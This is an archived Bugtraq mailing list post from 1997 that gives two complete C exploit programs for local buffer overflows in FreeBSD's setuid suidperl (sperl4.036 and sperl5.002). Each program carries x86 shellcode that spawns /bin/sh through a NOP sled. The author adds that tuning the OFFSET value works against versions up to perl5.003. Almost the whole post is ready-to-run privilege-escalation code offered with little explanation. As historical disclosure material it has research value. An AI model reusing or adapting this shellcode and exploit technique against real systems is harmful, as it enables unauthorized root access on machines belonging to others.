Bugtraq mailing list archives
Exploits for FreeBSD sperl4.036 & sperl5.00x
From: deliver () FREE POLBOX PL (Deliver)
Date: Mon, 21 Apr 1997 16:34:41 PDT
If somebody want to test perl5.00X or perl4.036 buffer overflow exploits there are two for FreeBSD... First works on perl4.036 and the second on perl5.002 ... With a little modyfication of OFFSET value you can overflow all versions up to perl5.003 ------------cut-------------cut-------------cut------------cut------------ /************************************************************/ /* Exploit for FreeBSD sperl4.036 by OVX */ /************************************************************/ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #define BUFFER_SIZE 1400 #define OFFSET 600 char *get_esp(void) { asm("movl %esp,%eax"); } char buf[BUFFER_SIZE]; main(int argc, char *argv[]) { int i; char execshell[] = "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; for(i=0+1;i<BUFFER_SIZE-4;i+=4) *(char **)&buf[i] = get_esp() - OFFSET; memset(buf,0x90,768+1); memcpy(&buf[768+1],execshell,strlen(execshell)); buf[BUFFER_SIZE-1]=0; execl("/usr/bin/sperl4.036", "/usr/bin/sperl4.036", buf, NULL); } ------------cut-------------cut-------------cut------------cut------------ /************************************************************/ /* Exploit for FreeBSD sperl5.00X by OVX */ /************************************************************/ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #define BUFFER_SIZE 1400 #define OFFSET 1000 char *get_esp(void) { asm("movl %esp,%eax"); } char buf[BUFFER_SIZE]; main(int argc, char *argv[]) { int i; char execshell[] = "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; for(i=0;i<BUFFER_SIZE-4;i+=4) *(char **)&buf[i] = get_esp() - OFFSET; memset(buf,0x90,768); memcpy(&buf[768],execshell,strlen(execshell)); buf[BUFFER_SIZE-1]=0; execl("/usr/bin/sperl5.002", "/usr/bin/sperl5.002", buf, NULL); } ------------cut-------------cut-------------cut------------cut------------ PS: Pozdrowienia dla wszystkich polskich hackerow ... ////////////////////////////////////////////////////////////////////////// // ANY QUESTIONS ? // // OVX - deliver () free polbox pl // //////////////////////////////////////////////////////////////////////////
Current thread:
- Exploits for FreeBSD sperl4.036 & sperl5.00x Deliver (Apr 21)